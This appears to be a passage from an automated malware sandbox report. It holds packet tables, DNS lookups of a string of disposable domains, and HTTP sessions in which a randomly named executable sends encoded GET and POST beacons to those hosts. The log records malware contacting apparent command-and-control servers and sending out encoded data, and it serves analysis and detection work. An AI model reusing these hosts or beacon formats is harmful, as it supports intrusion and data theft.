                                                                        Nov 7, 2024 10:12:13.282228947 CET5000780192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:14.305124998 CET5000880192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:14.310138941 CET805000867.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:14.310245991 CET5000880192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:14.323975086 CET5000880192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:14.328834057 CET805000867.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:14.994524002 CET805000867.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:15.032691002 CET805000867.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:15.032840967 CET5000880192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:15.033982992 CET5000880192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:15.038764000 CET805000867.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:20.465137959 CET5000980192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:20.470004082 CET8050009206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:20.470217943 CET5000980192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:20.481391907 CET5000980192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:20.488409042 CET8050009206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:21.403739929 CET8050009206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:21.453682899 CET5000980192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:21.579507113 CET8050009206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:21.579562902 CET5000980192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:21.985152960 CET5000980192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:23.018002033 CET5001080192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:23.022932053 CET8050010206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:23.023013115 CET5001080192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:23.068267107 CET5001080192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:23.073147058 CET8050010206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:23.963917017 CET8050010206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:24.081182003 CET5001080192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:24.141746998 CET8050010206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:24.142040014 CET5001080192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:24.594386101 CET5001080192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:25.613025904 CET5001180192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:25.618179083 CET8050011206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:25.618280888 CET5001180192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:25.629606962 CET5001180192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:25.634473085 CET8050011206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:25.634624004 CET8050011206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:26.574258089 CET8050011206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:26.626710892 CET5001180192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:26.756738901 CET8050011206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:26.757273912 CET5001180192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:27.141338110 CET5001180192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:28.161156893 CET5001280192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:28.166256905 CET8050012206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:28.166412115 CET5001280192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:28.173502922 CET5001280192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:28.178263903 CET8050012206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:29.106376886 CET8050012206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:29.156766891 CET5001280192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:29.273803949 CET8050012206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:29.273921967 CET5001280192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:29.275134087 CET5001280192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:29.279910088 CET8050012206.119.81.36192.168.2.5
                                                                        Nov 7, 2024 10:12:34.362984896 CET5001380192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:34.370547056 CET805001384.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:34.370795965 CET5001380192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:34.425335884 CET5001380192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:34.431598902 CET805001384.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:35.181370974 CET805001384.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:35.181499004 CET5001380192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:35.940911055 CET5001380192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:35.945794106 CET805001384.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:36.960082054 CET5001480192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:36.965017080 CET805001484.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:36.965092897 CET5001480192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:36.984169006 CET5001480192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:36.989057064 CET805001484.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:38.143198013 CET805001484.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:38.145478964 CET5001480192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:38.500567913 CET5001480192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:38.505445004 CET805001484.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:39.519501925 CET5001580192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:39.524537086 CET805001584.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:39.524660110 CET5001580192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:39.535459995 CET5001580192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:39.540375948 CET805001584.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:39.540524006 CET805001584.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:40.356102943 CET805001584.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:40.357287884 CET5001580192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:41.047544956 CET5001580192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:41.052659988 CET805001584.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:42.066237926 CET5001680192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:42.071259022 CET805001684.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:42.071624994 CET5001680192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:42.078824043 CET5001680192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:42.083698034 CET805001684.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:42.889725924 CET805001684.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:42.889894962 CET805001684.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:42.889909029 CET805001684.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:42.890104055 CET5001680192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:42.890188932 CET805001684.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:42.890207052 CET805001684.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:42.890357971 CET5001680192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:42.890495062 CET805001684.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:42.890510082 CET805001684.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:42.890526056 CET805001684.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:42.890547037 CET805001684.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:42.890549898 CET5001680192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:42.890577078 CET5001680192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:42.938024044 CET5001680192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:43.002633095 CET805001684.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:43.002756119 CET5001680192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:43.004369974 CET5001680192.168.2.584.32.84.32
                                                                        Nov 7, 2024 10:12:43.009191036 CET805001684.32.84.32192.168.2.5
                                                                        Nov 7, 2024 10:12:48.104317904 CET5001780192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:48.109340906 CET8050017195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:48.111777067 CET5001780192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:48.123222113 CET5001780192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:48.128159046 CET8050017195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:48.947371960 CET8050017195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:49.000535965 CET5001780192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:49.071979046 CET8050017195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:49.072047949 CET5001780192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:49.625632048 CET5001780192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:50.644413948 CET5001880192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:50.649602890 CET8050018195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:50.653340101 CET5001880192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:50.664100885 CET5001880192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:50.669085026 CET8050018195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:51.495136976 CET8050018195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:51.578809023 CET5001880192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:51.619622946 CET8050018195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:51.619688988 CET5001880192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:52.173209906 CET5001880192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:53.191992044 CET5001980192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:53.196942091 CET8050019195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:53.197021008 CET5001980192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:53.210819006 CET5001980192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:53.215806961 CET8050019195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:53.215817928 CET8050019195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:54.052321911 CET8050019195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:54.094316959 CET5001980192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:54.177727938 CET8050019195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:54.181345940 CET5001980192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:54.719394922 CET5001980192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:55.738842964 CET5002080192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:55.743870020 CET8050020195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:55.743992090 CET5002080192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:55.756026030 CET5002080192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:55.760910034 CET8050020195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:56.585658073 CET8050020195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:56.645190001 CET5002080192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:56.710498095 CET8050020195.110.124.133192.168.2.5
                                                                        Nov 7, 2024 10:12:56.713321924 CET5002080192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:56.721189022 CET5002080192.168.2.5195.110.124.133
                                                                        Nov 7, 2024 10:12:56.725991964 CET8050020195.110.124.133192.168.2.5

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 7, 2024 10:09:51.605022907 CET6517853192.168.2.51.1.1.1
                                                                        Nov 7, 2024 10:09:51.628357887 CET53651781.1.1.1192.168.2.5
                                                                        Nov 7, 2024 10:10:08.269922972 CET6270353192.168.2.51.1.1.1
                                                                        Nov 7, 2024 10:10:08.482335091 CET53627031.1.1.1192.168.2.5
                                                                        Nov 7, 2024 10:10:22.863465071 CET5274453192.168.2.51.1.1.1
                                                                        Nov 7, 2024 10:10:23.011392117 CET53527441.1.1.1192.168.2.5
                                                                        Nov 7, 2024 10:11:07.645395041 CET6447553192.168.2.51.1.1.1
                                                                        Nov 7, 2024 10:11:07.679013014 CET53644751.1.1.1192.168.2.5
                                                                        Nov 7, 2024 10:11:21.597673893 CET6132253192.168.2.51.1.1.1
                                                                        Nov 7, 2024 10:11:21.618681908 CET53613221.1.1.1192.168.2.5
                                                                        Nov 7, 2024 10:11:34.895554066 CET5991253192.168.2.51.1.1.1
                                                                        Nov 7, 2024 10:11:35.631695032 CET53599121.1.1.1192.168.2.5
                                                                        Nov 7, 2024 10:11:51.630115032 CET6276253192.168.2.51.1.1.1
                                                                        Nov 7, 2024 10:11:52.435889959 CET53627621.1.1.1192.168.2.5
                                                                        Nov 7, 2024 10:12:06.254698038 CET5552453192.168.2.51.1.1.1
                                                                        Nov 7, 2024 10:12:06.656352997 CET53555241.1.1.1192.168.2.5
                                                                        Nov 7, 2024 10:12:20.077240944 CET5526253192.168.2.51.1.1.1
                                                                        Nov 7, 2024 10:12:20.461895943 CET53552621.1.1.1192.168.2.5
                                                                        Nov 7, 2024 10:12:34.287273884 CET6550753192.168.2.51.1.1.1
                                                                        Nov 7, 2024 10:12:34.353945017 CET53655071.1.1.1192.168.2.5
                                                                        Nov 7, 2024 10:12:48.019638062 CET5684253192.168.2.51.1.1.1
                                                                        Nov 7, 2024 10:12:48.097973108 CET53568421.1.1.1192.168.2.5
                                                                        Nov 7, 2024 10:13:02.160181999 CET5638053192.168.2.51.1.1.1
                                                                        Nov 7, 2024 10:13:02.173502922 CET53563801.1.1.1192.168.2.5

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 7, 2024 10:09:51.605022907 CET192.168.2.51.1.1.10x68d5Standard query (0)www.trifecta.centerA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:10:08.269922972 CET192.168.2.51.1.1.10x8dbStandard query (0)www.seraph.bestA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:10:22.863465071 CET192.168.2.51.1.1.10x7cc2Standard query (0)www.owinvip.netA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:11:07.645395041 CET192.168.2.51.1.1.10x5136Standard query (0)www.thefokusdong43.clickA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:11:21.597673893 CET192.168.2.51.1.1.10x93c3Standard query (0)www.spencermarcu.movieA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:11:34.895554066 CET192.168.2.51.1.1.10x6b43Standard query (0)www.roopiedutech.onlineA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:11:51.630115032 CET192.168.2.51.1.1.10x698Standard query (0)www.seikai.clickA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:12:06.254698038 CET192.168.2.51.1.1.10x1ae9Standard query (0)www.jorbaq.topA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:12:20.077240944 CET192.168.2.51.1.1.10xb0c1Standard query (0)www.neg21.topA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:12:34.287273884 CET192.168.2.51.1.1.10x2f3aStandard query (0)www.suerteconysa.onlineA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:12:48.019638062 CET192.168.2.51.1.1.10x6defStandard query (0)www.nutrigenfit.onlineA (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:13:02.160181999 CET192.168.2.51.1.1.10x1eb3Standard query (0)www.meetebok.shopA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 7, 2024 10:09:51.628357887 CET1.1.1.1192.168.2.50x68d5No error (0)www.trifecta.centertrifecta.centerCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 7, 2024 10:09:51.628357887 CET1.1.1.1192.168.2.50x68d5No error (0)trifecta.center3.33.130.190A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:09:51.628357887 CET1.1.1.1192.168.2.50x68d5No error (0)trifecta.center15.197.148.33A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:10:08.482335091 CET1.1.1.1192.168.2.50x8dbNo error (0)www.seraph.best52.20.84.62A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:10:23.011392117 CET1.1.1.1192.168.2.50x7cc2No error (0)www.owinvip.netowinvip.netCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 7, 2024 10:10:23.011392117 CET1.1.1.1192.168.2.50x7cc2No error (0)owinvip.net3.33.130.190A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:10:23.011392117 CET1.1.1.1192.168.2.50x7cc2No error (0)owinvip.net15.197.148.33A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:11:07.679013014 CET1.1.1.1192.168.2.50x5136No error (0)www.thefokusdong43.clickthefokusdong43.clickCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 7, 2024 10:11:07.679013014 CET1.1.1.1192.168.2.50x5136No error (0)thefokusdong43.click172.96.191.232A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:11:21.618681908 CET1.1.1.1192.168.2.50x93c3No error (0)www.spencermarcu.moviespencermarcu.movieCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 7, 2024 10:11:21.618681908 CET1.1.1.1192.168.2.50x93c3No error (0)spencermarcu.movie3.33.130.190A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:11:21.618681908 CET1.1.1.1192.168.2.50x93c3No error (0)spencermarcu.movie15.197.148.33A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:11:35.631695032 CET1.1.1.1192.168.2.50x6b43No error (0)www.roopiedutech.onlineroopiedutech.onlineCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 7, 2024 10:11:35.631695032 CET1.1.1.1192.168.2.50x6b43No error (0)roopiedutech.online103.191.208.137A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:11:52.435889959 CET1.1.1.1192.168.2.50x698No error (0)www.seikai.click183.90.181.102A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:12:06.656352997 CET1.1.1.1192.168.2.50x1ae9No error (0)www.jorbaq.top67.223.117.142A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:12:20.461895943 CET1.1.1.1192.168.2.50xb0c1No error (0)www.neg21.topneg21.topCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 7, 2024 10:12:20.461895943 CET1.1.1.1192.168.2.50xb0c1No error (0)neg21.top206.119.81.36A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:12:34.353945017 CET1.1.1.1192.168.2.50x2f3aNo error (0)www.suerteconysa.onlinesuerteconysa.onlineCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 7, 2024 10:12:34.353945017 CET1.1.1.1192.168.2.50x2f3aNo error (0)suerteconysa.online84.32.84.32A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:12:48.097973108 CET1.1.1.1192.168.2.50x6defNo error (0)www.nutrigenfit.onlinenutrigenfit.onlineCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 7, 2024 10:12:48.097973108 CET1.1.1.1192.168.2.50x6defNo error (0)nutrigenfit.online195.110.124.133A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:13:02.173502922 CET1.1.1.1192.168.2.50x1eb3No error (0)www.meetebok.shop104.21.29.71A (IP address)IN (0x0001)false
                                                                        Nov 7, 2024 10:13:02.173502922 CET1.1.1.1192.168.2.50x1eb3No error (0)www.meetebok.shop172.67.148.146A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • www.trifecta.center
                                                                        • www.seraph.best
                                                                        • www.owinvip.net
                                                                        • www.thefokusdong43.click
                                                                        • www.spencermarcu.movie
                                                                        • www.roopiedutech.online
                                                                        • www.seikai.click
                                                                        • www.jorbaq.top
                                                                        • www.neg21.top
                                                                        • www.suerteconysa.online
                                                                        • www.nutrigenfit.online

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.5499203.33.130.190802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:09:51.650985956 CET358OUTGET /4d7f/?yx-=dF9dYX9pQR-xIhFp&N6gPj2W=GYb0rmyr/JAlLZNhnt/PbSIY/4LKqg5t8esebmIUXrwcEcXD+HGwSEbbxHn9xefIHUHI8DRuA6hSDuYZVaPcSdBlDCtcl1FCkIwA6S5urJUXpT4lrZ2q29hRsWK9NvLVVQ== HTTP/1.1
                                                                        Host: www.trifecta.center
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:09:53.221529961 CET416INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 09:09:53 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 276
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 78 2d 3d 64 46 39 64 59 58 39 70 51 52 2d 78 49 68 46 70 26 4e 36 67 50 6a 32 57 3d 47 59 62 30 72 6d 79 72 2f 4a 41 6c 4c 5a 4e 68 6e 74 2f 50 62 53 49 59 2f 34 4c 4b 71 67 35 74 38 65 73 65 62 6d 49 55 58 72 77 63 45 63 58 44 2b 48 47 77 53 45 62 62 78 48 6e 39 78 65 66 49 48 55 48 49 38 44 52 75 41 36 68 53 44 75 59 5a 56 61 50 63 53 64 42 6c 44 43 74 63 6c 31 46 43 6b 49 77 41 36 53 35 75 72 4a 55 58 70 54 34 6c 72 5a 32 71 32 39 68 52 73 57 4b 39 4e 76 4c 56 56 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yx-=dF9dYX9pQR-xIhFp&N6gPj2W=GYb0rmyr/JAlLZNhnt/PbSIY/4LKqg5t8esebmIUXrwcEcXD+HGwSEbbxHn9xefIHUHI8DRuA6hSDuYZVaPcSdBlDCtcl1FCkIwA6S5urJUXpT4lrZ2q29hRsWK9NvLVVQ=="}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.54998152.20.84.62802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:10:08.503473997 CET603OUTPOST /qfwu/ HTTP/1.1
                                                                        Host: www.seraph.best
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.seraph.best
                                                                        Referer: http://www.seraph.best/qfwu/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 33 64 71 52 59 43 4a 6d 30 6a 6a 51 79 6e 58 68 4a 53 4a 54 43 78 73 4f 7a 67 49 48 33 6e 53 49 57 5a 30 49 31 4d 50 67 57 35 31 4f 30 53 49 31 46 64 31 36 49 50 4a 6f 4d 31 73 45 4c 53 44 7a 63 66 6d 51 69 68 36 4f 48 58 4b 70 72 53 62 4b 54 43 4e 72 6a 63 69 58 50 7a 72 35 6b 5a 38 69 43 61 2b 56 55 37 55 49 37 4a 6d 36 4f 54 63 6d 78 75 64 7a 71 2f 50 42 31 79 65 6e 4c 55 47 6f 6f 2b 4e 58 63 4b 68 58 42 4c 37 72 73 36 74 37 36 46 48 4e 36 65 34 31 62 54 4c 44 4c 6d 4a 39 6c 57 4f 58 4d 47 73 44 6a 73 6a 65 55 43 66 63 34 57 31 57 49 42 69 77 73 6b 31 69 72 69 57 79 52 79 52 5a 42 49 73 3d
                                                                        Data Ascii: N6gPj2W=3dqRYCJm0jjQynXhJSJTCxsOzgIH3nSIWZ0I1MPgW51O0SI1Fd16IPJoM1sELSDzcfmQih6OHXKprSbKTCNrjciXPzr5kZ8iCa+VU7UI7Jm6OTcmxudzq/PB1yenLUGoo+NXcKhXBL7rs6t76FHN6e41bTLDLmJ9lWOXMGsDjsjeUCfc4W1WIBiwsk1iriWyRyRZBIs=
                                                                        Nov 7, 2024 10:10:09.152996063 CET303INHTTP/1.1 405 Not Allowed
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 09:10:09 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 154
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.54998252.20.84.62802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:10:11.052347898 CET623OUTPOST /qfwu/ HTTP/1.1
                                                                        Host: www.seraph.best
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.seraph.best
                                                                        Referer: http://www.seraph.best/qfwu/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
